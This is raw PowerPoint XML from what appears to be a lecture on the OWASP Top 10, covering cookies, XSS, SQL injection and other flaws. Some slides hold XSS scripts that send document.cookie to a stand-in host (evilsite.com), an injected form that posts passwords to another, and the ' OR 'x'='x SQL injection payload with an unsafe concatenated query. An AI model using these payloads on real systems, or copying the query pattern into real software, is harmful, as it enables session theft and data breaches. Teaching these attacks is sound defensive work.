              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>i.e. almost </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>any </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>interesting website</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="180975" indent="-180975">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="Times New Roman" pitchFamily="-1" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="57347" name="Picture 4" descr="Screen Shot 2017-03-09 at 17.1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192338"/>
            <a:ext cx="72691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00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60363"/>
            <a:ext cx="8232775" cy="439737"/>
          </a:xfrm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Cookies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9538"/>
            <a:ext cx="8232775" cy="5092700"/>
          </a:xfr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600"/>
              <a:t>Cookies are small pieces of information stored on a client and associated with a specific server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When you access a specific website, it might store information as a cookie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Every time you revisit that server, the cookie is re-sent to the server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Effectively used to hold state information over sessions</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" altLang="en-US" sz="2200"/>
            </a:br>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="220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600"/>
              <a:t>Cookies can hold any type of information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Can also hold sensitive information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900"/>
              <a:t>This includes passwords, credit card information, social security number, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2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900"/>
              <a:t>Session cookies, non-persistent cookies, persistent cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="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200"/>
              <a:t>Almost every sophisticated website uses cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="424027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Cookie Stealing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257300"/>
            <a:ext cx="8636000" cy="5105400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>Attack 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Times New Roman" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Times New Roman" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800"/>
              <a:t>document.location = "http://www.evilsite.com/steal.php?cookie="+document.cookie;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Times New Roman" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800"/>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Times New Roman" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>Attack 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Times New Roman" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Times New Roman" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800"/>
              <a:t>img = new Image();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Times New Roman" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800"/>
              <a:t>img.src = "http://www.evilsite.com/steal.php?cookie=" + document.cookie;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Times New Roman" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="180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599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86672C-395D-0543-8EFF-8F0E3AEB4419}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200" b="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200" b="0">
              <a:latin typeface="Arial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Protecting Cookies </a:t>
            </a:r>
            <a:endParaRPr lang="en-US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8570913" cy="5349875"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Make cookies </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1"/>
              <a:t>HttpOnly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Restricts access from non-HTTP sources (e.g. JavaScript)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1"/>
              <a:t>secure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Times New Roman" charset="0"/>
              <a:buNone/>
            </a:pPr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6589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XSS using HTML only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33363" y="1257300"/>
            <a:ext cx="8709025" cy="5105400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>It’s possible to simply inject a HTML form, for example</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>Consider for example an attacker entering the following: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Times New Roman" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Times New Roman" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>&lt;form action=http://www.anevilsite.com/steal.php&gt;Enter your password </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="1900">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>&lt;input type="password" name="pass"&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="1900">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>&lt;input type="submit" value="Submit"&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="1900">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>&lt;/form&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>This will provide a text box to collect the password of a (perhaps naïve) user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Times New Roman" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Times New Roman" charset="0"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5589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9785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90"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A8: Insecure Deserialization</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00009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Many </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>languages and frameworks support object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>serialization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>i.e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. the state of an object is converted into a byte stream, for example to write to a file. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>This can be done with open formats such as JSON or XML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Or native techniques such as Java object serialization</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>The reverse is deserialization. This creates a copy of the object by reading in an appropriately formatted byte stream. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Attackers can provide malicious objects to exploit deserialization that does not validate input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Common remote code execution vulnerability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Problem with known vulnerabilities is that</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>Attackers will be aware of them</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>Exploits are likely to exist, possibly “off-the-shelf” </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>Most modern apps rely on many third party components</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>e.g. commercial and open-source libraries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>Such components usually have full privileges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>There is no standard automatic way to query whether a particular version of a particular component has a known vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>Components with known vulnerabilities are frequently downloaded and used in practice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97850" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A9: Using components with known vulnerabilities </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="72428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96900" y="1422400"/>
            <a:ext cx="8039100" cy="4940300"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>Many serious attacks go undetected for a long time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>Studies of data breaches show time to detect a breach is typically more than 7 months, and then often by external parties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>Recommended practice:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Log all authentication, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>authorisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> and input validation failures. Include context.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Ensure sensitive transactions have integrity controls </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> e.g. append-only databases</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Set up effective monitoring and alerting processes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Establish incident response and recovery plan</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="18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1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp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9785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90"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A10: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Insufficient Logging &amp; Monitoring</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" alt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4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5800" y="6413500"/>
            <a:ext cx="1905000" cy="29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fld id="{CE49C7CA-DA30-1C4B-979D-27157F4A129B}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1000" b="0" i="1">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr algn="l"/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1000" b="0" i="1">
              <a:latin typeface="Arial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316884"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="384877"/>
          <a:ext cx="8915400" cy="5330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owasp-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5065486"/>
            <a:ext cx="6474571" cy="1556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81000" y="114300"/>
            <a:ext cx="85232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00"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2900" b="0" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>OWASP Top 10 Critical Vulnerabilities 2017 (RC2)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="29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7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58800" y="0"/>
            <a:ext cx="8245475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000090"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A1: Injection Attacks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60500"/>
            <a:ext cx="8223250" cy="4864100"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Injection attacks trick an application into including unintended commands in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>sent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>to an interpreter.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-GB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sz="2600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Interpreters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Interpret strings as commands.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>e.g. SQL, shell (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>cmd.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>, bash), LDAP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-GB" sz="22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GB" sz="2600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Key Idea</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Input data from the application is executed as code by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3671075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SQL Injection Attack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z="2600">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Many web applications take user input from a form</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="26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sz="2600">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Sometimes this user input is used literally in the construction of a SQL query submitted to a database. For example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="622300" lvl="1" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>SELECT * FROM students WHERE studentid = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" i="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>ID as entered by user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ja-JP" sz="2000">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Courier New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GB" sz="26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sz="2600">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>An SQL injection attack involves placing SQL statements in the user input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="752954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An Example SQL Injection Attack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82700"/>
            <a:ext cx="8267700" cy="5130800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1176"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Hacker Enters:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>This input is put directly into the SQL statement within the web application:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="355600" lvl="1" indent="0">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>query = "SELECT * FROM students WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>studentid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> = '" </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>("ID") + "'";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="533400" lvl="1" indent="0">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Creates the following SQL:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="355600" lvl="1" indent="0">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>SELECT * FROM students WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>studentid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>blah' </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>OR 'x' = 'x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="812800" lvl="1" indent="-279400">
              <a:spcBef>
                <a:spcPts val="1675"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="812800" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
